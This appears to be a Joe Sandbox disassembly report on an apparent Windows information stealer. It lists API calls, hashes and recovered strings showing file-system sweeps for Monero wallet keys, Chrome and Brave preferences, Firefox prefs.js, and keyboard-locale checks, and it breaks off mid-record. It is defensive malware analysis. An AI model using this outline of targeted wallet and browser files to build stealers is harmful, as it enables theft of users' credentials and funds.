                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: dbfad9a40f60d4e4b59b1d5c9a95617d1858f2a4420447abfa4645f5190cfddd
                  • Instruction ID: 3b311364b5ccf8dd57665d2b0fdd6f975557f0ab62df6135b5e57e1fc33f9fe3
                  • Opcode Fuzzy Hash: dbfad9a40f60d4e4b59b1d5c9a95617d1858f2a4420447abfa4645f5190cfddd
                  • Instruction Fuzzy Hash: E3A14EB5A403189BDB24DFA4DC85FEE73B8FB59700F4445C8A60D96181EB749B84CFA2
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00B20B32,00B20B2B,00000000,?,?,?,00B213F4,00B20B2A), ref: 00B0BEF5
                  • StrCmpCA.SHLWAPI(?,00B213F8), ref: 00B0BF4D
                  • StrCmpCA.SHLWAPI(?,00B213FC), ref: 00B0BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00B0C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: eab8c929180800f2f9c609489ed62f41e374744ec145d82fdbbe679f37c120d8
                  • Instruction ID: 0ffe39039df1ce4056b2d9c0a2b249405019a6c78ce1775cb57ddd3fa2aa5525
                  • Opcode Fuzzy Hash: eab8c929180800f2f9c609489ed62f41e374744ec145d82fdbbe679f37c120d8
                  • Instruction Fuzzy Hash: CD4262729111049BCB14FB64DD96EED77BCAF54310F8045D8B50AA61D1EF30AF89CBA2
                  APIs
                  • wsprintfA.USER32 ref: 00B1492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                  • StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                  • StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                  • FindClose.KERNEL32(000000FF), ref: 00B14B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 39bc94051a589f195f84e3358a745991a701a1553609ce112febf1999d155a42
                  • Instruction ID: 0468e981c52c37ccb9a17ef17d6202a2c737295782a5562063ca15c6f75f0d55
                  • Opcode Fuzzy Hash: 39bc94051a589f195f84e3358a745991a701a1553609ce112febf1999d155a42
                  • Instruction Fuzzy Hash: C86176B5950218ABCB24EFA4DC45EEA73BCFB59700F4045C8B60D96181EB30EB85CFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B14580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B14587
                  • wsprintfA.USER32 ref: 00B145A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B145BD
                  • StrCmpCA.SHLWAPI(?,00B20FC4), ref: 00B145EB
                  • StrCmpCA.SHLWAPI(?,00B20FC8), ref: 00B14601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B1468B
                  • FindClose.KERNEL32(000000FF), ref: 00B146A0
                  • lstrcat.KERNEL32(?,011FE280), ref: 00B146C5
                  • lstrcat.KERNEL32(?,011FD758), ref: 00B146D8
                  • lstrlen.KERNEL32(?), ref: 00B146E5
                  • lstrlen.KERNEL32(?), ref: 00B146F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: ce37dcb1815f02f88dfead1b77c9fbbefa0161319a774ef6b1ae89a660b47c1d
                  • Instruction ID: cf1d8d467243a13bda1c1d05405bfe1fcfdeec24dfc0818d9b32a1c986660717
                  • Opcode Fuzzy Hash: ce37dcb1815f02f88dfead1b77c9fbbefa0161319a774ef6b1ae89a660b47c1d
                  • Instruction Fuzzy Hash: A05145B69502189BC724EF74DC89FED77BCEB58300F4045C8B609D6190EB749B858FA1
                  APIs
                  • wsprintfA.USER32 ref: 00B13EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B13EDA
                  • StrCmpCA.SHLWAPI(?,00B20FAC), ref: 00B13F08
                  • StrCmpCA.SHLWAPI(?,00B20FB0), ref: 00B13F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B1406C
                  • FindClose.KERNEL32(000000FF), ref: 00B14081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 5f932432ea01ccd81a03e9be74ab15d7f09ce62fe0cf660049b0f86c77532029
                  • Instruction ID: 75634d13bf0c0c098f663105aedec213371cb871564d903fece96c3ba98db20c
                  • Opcode Fuzzy Hash: 5f932432ea01ccd81a03e9be74ab15d7f09ce62fe0cf660049b0f86c77532029
                  • Instruction Fuzzy Hash: 84516AB6940318ABCB24EFB4DC85EE973BCFB58700F4045C8B65996180EB75DB858FA1
                  APIs
                  • wsprintfA.USER32 ref: 00B0ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B0ED55
                  • StrCmpCA.SHLWAPI(?,00B21538), ref: 00B0EDAB
                  • StrCmpCA.SHLWAPI(?,00B2153C), ref: 00B0EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00B0F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: aa6e449f39596b1e54afeaf01d44fc39a5c70f532fca58fbaaabaab40e9cd955
                  • Instruction ID: ba61bef43799b7a391bc4885784822da806172a8c74846516bc775a425260a9a
                  • Opcode Fuzzy Hash: aa6e449f39596b1e54afeaf01d44fc39a5c70f532fca58fbaaabaab40e9cd955
                  • Instruction Fuzzy Hash: F0E1F3719121189AEB55FB64DD52EEE73B8AF54310F8045E9B40A62092EF307FCACF52
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B215B8,00B20D96), ref: 00B0F71E
                  • StrCmpCA.SHLWAPI(?,00B215BC), ref: 00B0F76F
                  • StrCmpCA.SHLWAPI(?,00B215C0), ref: 00B0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00B0FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 51128d814956b2e432475efaa4cc16a1f7c5058d045a6bcf00b8302b77a982c3
                  • Instruction ID: a3da772a5ca757a6790893d69deae9898ba0bb04a936a9ca5b9556a1ae1f94c5
                  • Opcode Fuzzy Hash: 51128d814956b2e432475efaa4cc16a1f7c5058d045a6bcf00b8302b77a982c3
                  • Instruction Fuzzy Hash: 41B175719012189BCB24FF64DD95EED77B9AF54310F8085E8E40A96191EF306B8ACF92
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B2510C,?,?,?,00B251B4,?,?,00000000,?,00000000), ref: 00B01923
                  • StrCmpCA.SHLWAPI(?,00B2525C), ref: 00B01973
                  • StrCmpCA.SHLWAPI(?,00B25304), ref: 00B01989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B01D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00B01DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B01E20
                  • FindClose.KERNEL32(000000FF), ref: 00B01E32
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 9cff878d3d490f92eb608244b6c99854baae0983a98e7fa5141bf9678bec5b18
                  • Instruction ID: e94b6e250e7e02af0130d210c17a765008f2d8780a03ec70a7b8a5110bbef6dc
                  • Opcode Fuzzy Hash: 9cff878d3d490f92eb608244b6c99854baae0983a98e7fa5141bf9678bec5b18
                  • Instruction Fuzzy Hash: 7812EC719111189BDB19FB60DD96EEE73B8AF54310F8045D9A10A66091EF307FCACFA1
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B20C2E), ref: 00B0DE5E
                  • StrCmpCA.SHLWAPI(?,00B214C8), ref: 00B0DEAE
                  • StrCmpCA.SHLWAPI(?,00B214CC), ref: 00B0DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00B0E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: eb66167969ca100c3c3cfd3f03ee85de26dc3bcfdeaaa8eacae6b909e56f5bf2
                  • Instruction ID: 02f872215d60ffc17a38d4abadb12cfcf454c5bc781636a39136422df3ea6807
                  • Opcode Fuzzy Hash: eb66167969ca100c3c3cfd3f03ee85de26dc3bcfdeaaa8eacae6b909e56f5bf2
                  • Instruction Fuzzy Hash: 1DF18B718151189ADB29FB64DD96EEE73B8AF14310FC045D9A41A62091EF307FCACF62
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B214B0,00B20C2A), ref: 00B0DAEB
                  • StrCmpCA.SHLWAPI(?,00B214B4), ref: 00B0DB33
                  • StrCmpCA.SHLWAPI(?,00B214B8), ref: 00B0DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00B0DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 8819f8c7412ffffc19cbbdd3d7d107122d989483038088620330a7c1805abfd9
                  • Instruction ID: ba5a463fb597de914767572306b49218b0760b821ee2b6e5833de225ed7ca35b
                  • Opcode Fuzzy Hash: 8819f8c7412ffffc19cbbdd3d7d107122d989483038088620330a7c1805abfd9
                  • Instruction Fuzzy Hash: 9891487290010497CB14FFB4ED569ED77BDAF94310F4086E8F90A961D1EE34AB49CB92
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00B205AF), ref: 00B17BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B17BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B17C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B17C62
                  • LocalFree.KERNEL32(00000000), ref: 00B17D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f9e43291fbbe636edda4092dc7944a7e70a18082ab826bfc5855a2b7ac0a113b
                  • Instruction ID: f7c9efe6207144d6021c000b695acf2dab893beb14f6fa2758b33a65516a7bde
                  • Opcode Fuzzy Hash: f9e43291fbbe636edda4092dc7944a7e70a18082ab826bfc5855a2b7ac0a113b
                  • Instruction Fuzzy Hash: 61412C71941218ABDB24DF54DC99BEDB3B4FB44710F6041D9E009A2291DB342F86CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !6l$GBc$P1z$PH_$Pswz$Zx,$Um{
                  • API String ID: 0-2757611981
                  • Opcode ID: 3b246794d03f94bdc659a3e06828b68eb3e4474e2a9a1e3f521e19597a748723
                  • Instruction ID: 6983b8af724114955b8f1918efdf4a2a17cd6d7e27c5e9d5ac2b2f62d8633040
                  • Opcode Fuzzy Hash: 3b246794d03f94bdc659a3e06828b68eb3e4474e2a9a1e3f521e19597a748723
                  • Instruction Fuzzy Hash: 22B2F8F3608200AFE7046E29EC8567ABBE9EF94720F16893DEAC4C3744E63558458797
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B20D73), ref: 00B0E4A2
                  • StrCmpCA.SHLWAPI(?,00B214F8), ref: 00B0E4F2
                  • StrCmpCA.SHLWAPI(?,00B214FC), ref: 00B0E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: e23c67cf585d6362ba81780110b35ca672c3c83f9fc829cd87454c8fa1737693
                  • Instruction ID: a33893f55d51e2cdafa55b03aa8eb3cc8ea17a75aacfe3c5666923e61291e28b
                  • Opcode Fuzzy Hash: e23c67cf585d6362ba81780110b35ca672c3c83f9fc829cd87454c8fa1737693
                  • Instruction Fuzzy Hash: 26125F319111189BDB14FB60DD96EED73B8AF54310F8045E9B50AA61D1EE307FCACBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: &,s$-%~|$2,^$Bu}$Z{$['
                  • API String ID: 0-832473510
                  • Opcode ID: a46fa56749924d16d8defb93aebf20b86784cb7697f3e1bbbd219c4dc428654b
                  • Instruction ID: 8cbfcb7bc0b8be749c55084ba80cde03ad5cec5c8ad4584757f4a54456614794
                  • Opcode Fuzzy Hash: a46fa56749924d16d8defb93aebf20b86784cb7697f3e1bbbd219c4dc428654b
                  • Instruction Fuzzy Hash: 28A218F3A0C2109FE704AE2DEC8567AFBE9EF94220F16493DEAC5C7744E93558058792
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: P-^L$SJUw$i_R{$r)}$x7m?
                  • API String ID: 0-1857407287
                  • Opcode ID: dde06f25dcc9289eea30de3a5203d768b1c8c914dd6fcec76dff8dd696d033fa
                  • Instruction ID: 40c9f9be2d71fab752afb959a7e91aaaf7860fe2ee57d27f6e0c6486cc5877f8
                  • Opcode Fuzzy Hash: dde06f25dcc9289eea30de3a5203d768b1c8c914dd6fcec76dff8dd696d033fa
                  • Instruction Fuzzy Hash: 04B208F3A086009FE3046E2DEC8567ABBE5EF94720F1A493DEAC4C7744E63598058797
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0C87C
                  • lstrcat.KERNEL32(?,00B20B46), ref: 00B0C943
                  • lstrcat.KERNEL32(?,00B20B47), ref: 00B0C957
                  • lstrcat.KERNEL32(?,00B20B4E), ref: 00B0C978
                  Memory Dump Source
